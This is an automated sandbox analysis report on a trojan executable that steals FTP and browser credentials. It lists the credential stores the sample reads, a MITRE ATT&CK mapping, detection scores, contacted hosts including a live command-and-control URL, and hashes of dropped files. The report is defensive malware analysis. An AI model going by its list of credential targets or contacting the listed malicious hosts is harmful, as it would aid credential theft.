        Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
        Source: C:\Users\user\Desktop\o6OaOfrAQs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

        Remote Access Functionality

        Source: Yara match | File source: dump.pcap, type: PCAP
        MITRE ATT&CK Matrix, listed per tactic in matrix order; numbers in parentheses are the signature counts the matrix attaches to observed techniques:

        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
        Execution: Native API (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
        Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
        Privilege Escalation: Access Token Manipulation (1); Process Injection (11); DLL Side-Loading (1); Logon Script (Mac); Network Logon Script; Rc.common
        Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1)
        Credential Access: OS Credential Dumping (2); Credentials in Registry (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
        Discovery: Security Software Discovery (11); Virtualization/Sandbox Evasion (1); File and Directory Discovery (3); System Information Discovery (5); Remote System Discovery; System Owner/User Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
        Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (2); Clipboard Data (1); Keylogging; GUI Input Capture
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
        Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (13); Fallback Channels; Multiband Communication
        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
        Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data
        Source | Detection | Scanner | Label | Link
        o6OaOfrAQs.exe | 29% | Virustotal | - | Browse
        o6OaOfrAQs.exe | 51% | ReversingLabs | Win32.Trojan.Nemesis | -

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\nsg7AC7.tmp\System.dll | 0% | ReversingLabs | - | -
        C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Dykereeve\Jackbsningen\Telescopiform\Bestridende\AEGISIIIRadeonHelper.dll | 0% | ReversingLabs | - | -

        Source | Detection | Scanner | Label | Link | Download
        1.2.o6OaOfrAQs.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | - | Download File
        1.0.o6OaOfrAQs.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | - | Download File
        4.0.o6OaOfrAQs.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491 | - | Download File

        Source | Detection | Scanner | Label | Link
        ruhsalgelisim.com | 0% | Virustotal | - | Browse

        Source | Detection | Scanner | Label | Link
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe | -
        http://ruhsalgelisim.com/jgEyxsZj50.ttf | 0% | Avira URL Cloud | safe | -
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Avira URL Cloud | safe | -
        http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe | -
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 0% | Avira URL Cloud | safe | -
        http://185.246.220.85/habrik/five/fre.php | 100% | Avira URL Cloud | malware | -
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Avira URL Cloud | safe | -
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 0% | Virustotal | - | Browse
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        ruhsalgelisim.com | 85.95.248.49 | true | false | - | unknown

        Name | Malicious | Antivirus Detection | Reputation
        http://ruhsalgelisim.com/jgEyxsZj50.ttf | false | Avira URL Cloud: safe | unknown
        http://185.246.220.85/habrik/five/fre.php | true | Avira URL Cloud: malware | unknown

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
        http://nsis.sf.net/NSIS_Error | o6OaOfrAQs.exe | false | - | high
        http://nsis.sf.net/NSIS_ErrorError | o6OaOfrAQs.exe | false | - | high
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000626000.00000020.00000001.01000000.00000006.sdmp | false | - | high
        http://www.gopher.ftp://ftp. | o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
        IP | Domain | Country | ASN | ASN Name | Malicious
        85.95.248.49 | ruhsalgelisim.com | Turkey | 49467 | EUROTA-ASNEUROTAINTERNETSERVICESLTDTR | false
        185.246.220.85 | unknown | Germany | 10753 | LVLT-10753US | true
              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:829095
              Start date and time:2023-03-17 20:47:29 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 32s
              Hypervisor based Inspection enabled:false
              Report type:light
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
              Number of new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:o6OaOfrAQs.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@4/19@1/2
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:
              • Successful, ratio: 37% (good quality ratio 36.2%)
              • Quality average: 88.9%
              • Quality standard deviation: 21.6%
              HCA Information:
              • Successful, ratio: 81%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
              • Stop behavior analysis, all processes terminated
              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, UserOOBEBroker.exe, backgroundTaskHost.exe, svchost.exe
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, tile-service.weather.microsoft.com, wdcp.microsoft.com
              • Execution Graph export aborted for target o6OaOfrAQs.exe, PID 5540 because there are no executed functions
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              No simulations
              No context
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):54
              Entropy (8bit):4.838039816898156
              Encrypted:false
              SSDEEP:3:7KG/LmI/cXQQLQIfLBJXmgxv:OG/LmI/cXQQkIP2I
              MD5:FB5EE2C0CAC332EC8390F50016EF0769
              SHA1:11D9FB52FE5289140B9D52A38B56F99512B3A3A7
              SHA-256:C557AFE51AB22916E3423820A09D3805BF9DCDCECBEC4FE8DE2C67FB023BA631
              SHA-512:87CCEA7B203B8BFC4E21544FE4FE9693AF230E246C450E673410565791DFE8257E30354772FDCC114C7068D9295FDB491E9B52D1A3B490C0756E568B70B95C0A
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:[Bedrock]..Interthing=user32::EnumWindows(i r1 ,i 0)..
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):11776
              Entropy (8bit):5.832316471889005
              Encrypted:false
              SSDEEP:192:4PtkiQJr7jHYT87RfwXQ6YSYtOuVDi7IsFW14Ll8CO:H78TQIgGCDp14LGC
              MD5:B0C77267F13B2F87C084FD86EF51CCFC
              SHA1:F7543F9E9B4F04386DFBF33C38CBED1BF205AFB3
              SHA-256:A0CAC4CF4852895619BC7743EBEB89F9E4927CCDB9E66B1BCD92A4136D0F9C77
              SHA-512:F2B57A2EEA00F52A3C7080F4B5F2BB85A7A9B9F16D12DA8F8FF673824556C62A0F742B72BE0FD82A2612A4B6DBD7E0FDC27065212DA703C2F7E28D199696F66E
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:moderate, very likely benign file
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....oZ...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview:1
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:data
              Category:dropped
              Size (bytes):47
              Entropy (8bit):1.1262763721961973
              Encrypted:false
              SSDEEP:3:/lSllIEXln:AWE1
              MD5:D69FB7CE74DAC48982B69816C3772E4E
              SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
              SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
              SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
              Malicious:false
              Preview:........................................user.
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
              Category:dropped
              Size (bytes):34016
              Entropy (8bit):6.1021284380541925
              Encrypted:false
              SSDEEP:384:JP7a6wQdSCVWSdoEdXjYmxzfkfIwuWR7UPMEdxsTStsBdMQJK2wKucYkcuhV3:N7a6eiHdFdr7W5UPMgy+OBG2X90uhV3
              MD5:4FC7FC174E80C178225C2509027DF961
              SHA1:9FF62413EC0DD462F5F016EBC804F1D736D24796
              SHA-256:866B31DD39B97DEDAFD0FBD5672639EE91B47AD319C47816B4F6D01BFF93FF8C
              SHA-512:29261B9ABC4AF2F51C05B61A37721BC737B411530361A4B48A7BFFAB0F8263EA75BFD51B6E6E94E91E1D02DC442B534C3334B05FD8324E7CF307FA08179A1ED9
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Z.oPZ.oPZ.oPS..PR.oP..nQX.oP..jQK.oP..kQR.oP..lQX.oP).nQY.oPZ.nPt.oP..fQY.oP..oQ[.oP..P[.oPZ..P[.oP..mQ[.oPRichZ.oP........PE..d....5;a.........." .....0...:.......................................................F....`..........................................\.......]..........H............f..........H....O..p...........................@P...............@..p............................text............0.................. ..`.rdata...#...@...$...4..............@..@.data...@....p.......X..............@....pdata...............Z..............@..@.rsrc...H............^..............@..@.reloc..H............d..............@..B................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:data
              Category:dropped
              Size (bytes):297815
              Entropy (8bit):6.803960139750454
              Encrypted:false
              SSDEEP:6144:J35PGszPFp+EB9h18KeMJwYQl/w+ByCHqLBmv:J3FGsz93N8Kp60Bg
              MD5:12DF13549A2F50FB06EAAC92D2F36C05
              SHA1:5E1CD0421664E97B44B2C26960F4D298DAED0C99
              SHA-256:4EE38AAF3380FB3D7C4F57800A1692175C1D772E3A11028874CF2D8F5DC599F2
              SHA-512:6DD5811B457913D37B922904678A508A1762CDA447C195A660457B19D6302DB8E21586AFF0F22D41D73514CA926FEFE8554777EB558BD321ABF5B76C06527848
              Malicious:false
              Preview:.........T.........h........................@...KK.........[......W......b...................F................,........DD.......WW...................[..........P.'.........hhh.......^^....JJ....x.......F......aaa............................!............IIII...............WW.i......\\..................q.22...........m...555...........m..7.k......m...................c.QQ.........................,.......cc...........?..xxx...............4.........^.....................]].444.XX.........................................ggg..........]....jjjjj..77...........bbb...<<.................++......XX.......!!..qqq...............@.......eeee........[................00.A............................H.yyyyy.....FFFFF..kk.555........lll...H........ssss...MM..j........G...^^...........~.........PP............. ...............III.....}}}...........................""".....))...UU...l.)))).........++...%%..........######....hhh............::..^.5.....(((..............................n..""........zzzzzz......
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:data
              Category:dropped
              Size (bytes):42836
              Entropy (8bit):4.578518141395867
              Encrypted:false
              SSDEEP:768:AGQ+v3ebyf4b4Yv6Dub2I+MxA83BMUBaPqbIvcbYIrf:NQ+WApD42MxBMMaPqbZbYIrf
              MD5:3DAD0F9AF0356D18A46167665A352768
              SHA1:E5D083D2224DE4FC9105CB966CF3A53F9BB7D3C0
              SHA-256:8A124F4091887491B8FABE0C0C694B95C2D76F68FB4E9292C59FA5971074899C
              SHA-512:7CD0CF5AF5B79A146F22A2D68CC3500AF6068F1BFA48B5730E2C2236201E4B6B7CCED4DBB9121A525F41FC63C07403D1CB40F9267FBF81C5FFC2CB4FA6221E98
              Malicious:false
              Preview:.....WWW.......T..00.............A............>>>.lll.......NNNN........&...........s.$$$....................................++.;;;;...................TT........l.o..........ll.......vv.............+..............V.....'.>.....a....................y.!...{{{.11.<...333......................6666....ee................_.........5......88.............%%..<...........R.................................]]]].........888..............a.n..C.............>............P.....;;.....HHH.........bb.........eee...............QQ..cc..`....................................b.w.......--......GGG...JJJ.U......uu.VV....v..ii. ............FF.........K........................1.............44444.........................QQQ....,.//.....w...........ll.....SS....(.......H............B.....OOOO.........__....l..........................}..//.vvvv....ii................~~~..EEE..MM..............L.@@.....G...........:.................888..........))..............?......FF.......DDDD..............@@@@@...................
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):140
              Entropy (8bit):5.529383944212929
              Encrypted:false
              SSDEEP:3:yionv//thPl9vt3lAnsrtxBllDM9vFW0p/sXm1MMos9DwlTYTbklt/sbp:6v/lhPysx8vFW0pkX4iZlTYTI3Ebp
              MD5:4308BBBAB1DB146494AE5ABB07B8E6DB
              SHA1:58121574EEB070E26DDD75A964F3548E176E58A4
              SHA-256:EFB732049C674EB25BFCB2FA0CBCC45D24190BF1479C054647F424B31E34C828
              SHA-512:41C9B37516F8D6AB7155F890EE36C26FE4161383A93BFBF696AB18292774C3556642E898361D21CECCBFEFFAF5814495CFAC2C74791E02F068B055BD3AD87DE4
              Malicious:false
              Preview:.PNG........IHDR................a....sBIT....|.d....CIDAT8.c`.J..R..(...\.`..2.Y3...k.i......b..PN.....J.@6.l.`.Pd..A.....O...D....IEND.B`.
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):147
              Entropy (8bit):5.834297280344084
              Encrypted:false
              SSDEEP:3:yionv//thPl9vt3lAnsrtxBllPhF1MzoQxJrN7djpdXLImeR/mV2kg1p:6v/lhPysx1MzoQxlRZbCRaip
              MD5:38D787F55E22FB591135F9250CD259D4
              SHA1:0E135B0E1CA49A6E43DB4CB7596FAEA022E23924
              SHA-256:1ED839B015A67CAB9948469975411D982A96314CE82851EA2F9F6BB8D733A002
              SHA-512:4E21AB54B7110B4CD2EBC0E2CF6DF3F8C7C988495BCCA76949BC3C5EB669A793FCCDA5CB4DDB7B627A21734BD181FE44670757144CC2A007FCB695405F08EC2B
              Malicious:false
              Preview:.PNG........IHDR................a....sBIT....|.d....JIDAT8.c`..0b..O..&J]@5....tR.>........`.8.(6....-Z....a..&..3 ....4...<.............IEND.B`.
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):9515
              Entropy (8bit):5.04214621707661
              Encrypted:false
              SSDEEP:192:icoGT04mzNN8hYivh5gtE/PkjY09fdNQuQ:ibGg4mzNhi4tEHoDfHQuQ
              MD5:7B02E1AE16E2E709D7C97DE560B4DBE9
              SHA1:191A54644417F7D36F5CB4182DCDB3737D74BE51
              SHA-256:DA0B58F52BBC131F967942D1D8E9DE1B5721AE864BC21852A0AD4062332297CB
              SHA-512:4F689F854DB3F766B5E53CE2F19E9F8293C075EE3F9B18098EB05B352F2EC95DF85E49A78540781EB531BCE60C7B1F7890F1FE3C65200DEC3CB908E90FB827A1
              Malicious:false
              Preview:.;!@Lang2@!UTF-8!..; : Francisco Jr..; 4.37 : Fabricio Biazzotto ..; 18.05 : Atualizado por Felipe..;..;..;..;..;..;..;..;..0..7-Zip..Portuguese Brazilian..Portugu.s Brasileiro..401..OK..Cancelar........&Sim..&N.o..&Fechar..Ajuda....&Continuar..440..Sim pra &Todos..N.o pra T&odos..Parar..Reiniciar..&Em 2. plano..&Em 1. plano..&Pausar..Pausado..Voc. tem certeza que voc. quer cancelar?..500..&Arquivo..&Editar..&Visualizar..F&avoritos..&Ferramentas..&Ajuda..540..&Abrir..Abrir &por Dentro..Abrir p&or Fora..&Visualizar..&Editar..Re&nomear..&Copiar Para.....&Mover Para.....&Apagar..&Dividir arquivo.....Com&binar arquivos.....P&ropriedades..Comen&t.rio..Calcular checksum..Diff..Criar Pasta..Criar Arquivo..S&air..Link..&Correntes Alternantes..600..Selecionar &Tudo..Desmarcar Tudo..&Inverter Sele..o..Selecionar.....Desmarcar.....Selecionar por Tipo..Desfazer sele..o por Tipo..700...co&nes Grandes...c&ones Pequenos..&Lista..&Detalhes..730..Desorganizado..Visualiza..o
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:SVG Scalable Vector Graphics image
              Category:dropped
              Size (bytes):266
              Entropy (8bit):4.986245244009802
              Encrypted:false
              SSDEEP:6:tI9mc4slzc8SRIKMNo/aMhFl1OkUjq5eKVrGDVfqKlNK+:t4C8LKMuyMhPobjoprGDRlj
              MD5:8B727826F9D8C0C7C954EDE912CB0DEB
              SHA1:1518AA80747326B5353C22D32E57A33D61285119
              SHA-256:0783A7F518D3879C8F0F50B45FBD779A98652469E9B7C659CE41F14D1629D334
              SHA-512:0ABB243F9D1E0B6EDA0CB25D35C3449AB2B5B83078208F11B876A27FF11FF70B79F8BA97D4DA3AED21A8314C75FB2174D9378AF59B57DCB99DFF681D9AAB8561
              Malicious:false
              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">. <path d="M8 1a3 3 0 100 6 3 3 0 000-6zM6.5 8A4.49 4.49 0 002 12.5V14c0 1 1 1 1 1h10s1 0 1-1v-1.5A4.49 4.49 0 009.5 8z" style="marker:none" color="#bebebe" overflow="visible" fill="#2e3436"/>.</svg>.
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):12193
              Entropy (8bit):4.4720152705808935
              Encrypted:false
              SSDEEP:192:i2PDEeaNB1PmcptkcDHxbTvPnc67bMxQxGx4ch/JuLQRcg/oN96bPNljYiYr197:ikDFKBFmcPLx3HPnIsqrJuqcgAN96b87
              MD5:3C21135144AC7452E7DB66F0214F9D68
              SHA1:B1EC0589D769EAB5E4E8F0F8C21B157EF5EBB47D
              SHA-256:D095879B8BBC67A1C9875C5E9896942BACF730BD76155C06105544408068C59E
              SHA-512:0446A0E2570A1F360FD8700FD4C869C7E2DBB9476BBDEC2526A53844074C79691542B91455343C50941B8A6D5E02A58EE6AA539CC4C4AE9CF000B4034EF663E2
              Malicious:false
              Preview:.;!@Lang2@!UTF-8!..; : Kirill Gulyakevitch..; 9.07 : 2011-03-15 : Drive DRKA..;..;..;..;..;..;..;..;..;..0..7-Zip..Belarusian..............401..OK................&.....&....&......................&............440..... ... &........ ... .&.......................&.......&.. ....... ......&......... ......... ........ ....... .......... ........?..500..&......&........&........&..........&.......&.........540..&................ &................... .&................&................&.........&......... ......&........... ......&............&..... ..........&.'...... .............&...........&................. ......Diff..&........ .
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:SVG Scalable Vector Graphics image
              Category:dropped
              Size (bytes):998
              Entropy (8bit):5.186938379246791
              Encrypted:false
              SSDEEP:24:t4CBGD0QNRWLLxo2em0yKbRAecFxV0/wXK:gDrc0NtAecFiH
              MD5:CB1EEE7BDB582B756D0F68EF02D6D96D
              SHA1:9E9B0F25BC472EF1C1C13EEAC12FD11C4CC0D2D9
              SHA-256:20EA767E852A8EBF2C5BA16D56CBAE10BD09D6CBA89B372A57EAA973AD3281B4
              SHA-512:E22FAEAE78D244A0F4E7215B31125D5AA4FD66C0720B0DE61D12084EAB879D7A9E231CCD5CD431417115B0945B450DC348DA400D67DB1898513B7BD6B9C274DB
              Malicious:false
              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#bebebe" fill="#474747"><path d="M3 9h10c.554 0 1 .446 1 1v3c0 .554-.446 1-1 1H3c-.554 0-1-.446-1-1v-3c0-.554.446-1 1-1z" style="marker:none" overflow="visible"/><path d="M7 0s-.709-.014-1.447.356C4.814.725 4 1.666 4 3v3h2V3c0-.667.186-.725.447-.855C6.71 2.014 7 2 7 2h2s.291.014.553.145c.261.13.447.188.447.855v8h2V3c0-1.333-.814-2.275-1.553-2.644C9.71-.014 9 0 9 0z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" font-weight="400" font-family="sans-serif" overflow="visible"/><path d="M2 12h12v4H2z" style="marker:none" overflow="visible"/></g></svg>
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:HTML document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1245
              Entropy (8bit):5.462849750105637
              Encrypted:false
              SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
              MD5:5343C1A8B203C162A3BF3870D9F50FD4
              SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
              SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
              SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
              Malicious:false
              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):555
              Entropy (8bit):7.499536740374189
              Encrypted:false
              SSDEEP:12:6v/7anZhFxDEKwjAq0kaO/yvSL6T1pjNngLpzPanwmB9HE4JqSjF:5bDEPxdqKLmpqLdynw29kEqSZ
              MD5:BFF011148B773FA44B9A9BB029E8CC52
              SHA1:F2B838927E320D12649CEFDEA3AFE383C6650D7C
              SHA-256:B21DE7B432A7A67544D007ECC0FDD95F8E8C6129AF558A32102EE04C08635653
              SHA-512:A57C83AEE0E1F4C530D2F5B90589C31FD6E2FF8F62F998963284218FAC5EE164BCA7A619A9597DC3E2ECD0095A2CF04467E89EDF86700E1A90B3DF60B5121C9B
              Malicious:false
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:SVG Scalable Vector Graphics image
              Category:dropped
              Size (bytes):680
              Entropy (8bit):5.109191824773878
              Encrypted:false
              SSDEEP:12:t4CP5GEA9xI7jhz4AeW02KdTwWjhz4AeW02KdTPqkoop4p:t4CBGEAgF4AeW0/N4AeW0/Zqg4p
              MD5:379690952AAA576521D51249D404CBCD
              SHA1:61A8A95B0454422AA47379CF983B99FFDD839439
              SHA-256:EAD402FB0B85DB153356EC695016FD4F2C4031367D8ED6D1C1EF5FF4F28A8DE8
              SHA-512:35B6BC866C3D02A2486D3447C82405103DE89D46940F7FE44A7009E714BBA57FBE601EEC939C3206ADB06FB31C4FD1D3822A0ED52A346ACFDE5908643432F928
              Malicious:false
              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" fill="#474747"><path d="M13 5v2h1v5H4v2h12V5z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-weight="400" font-family="Sans" overflow="visible"/><path d="M0 2v9h12V2zm2 2h8v5H2z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-weight="400" font-family="Sans" overflow="visible"/><path d="M3 7c2.32 1 3.045-1.66 6 0v1H3z" style="marker:none" overflow="visible" opacity=".35"/></g></svg>
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):220
              Entropy (8bit):6.546211943247282
              Encrypted:false
              SSDEEP:6:6v/lhPysde0C1jngP3V95D2tOA/RDvhpLUxbVp:6v/7jC1zi3Sr/hW
              MD5:C84EE7522C124892455BB09DEBCF9340
              SHA1:AF87A2A5688346A3902762DD250328B7EF224620
              SHA-256:E0A3BD6FE1A1BAEFFE04BCA2980ADF755F888E31DCE3686B16C5DAC4202A38C8
              SHA-512:3BEED79366F15CD075781F677C0C9E84081D2189D1FB541A34AA25980B48701A3D93DC550E4ABEB550EFBE3167B1CAB8338E22F4603C6A71936876FBA75FAD58
              Malicious:false
              Process:C:\Users\user\Desktop\o6OaOfrAQs.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):144
              Entropy (8bit):5.708279548998072
              Encrypted:false
              SSDEEP:3:yionv//thPl9vt3lAnsrtxBllAoSF1/LvgStjP9f9uvJYUo+/JHt//sup:6v/lhPysKo21/Lvlt7V9+YUouJH1/jp
              MD5:1ED278AD206D6EA33FF787DD326E0FC5
              SHA1:8CFF7AD12FC0E5545E71D05879A0245BEDAF4D46
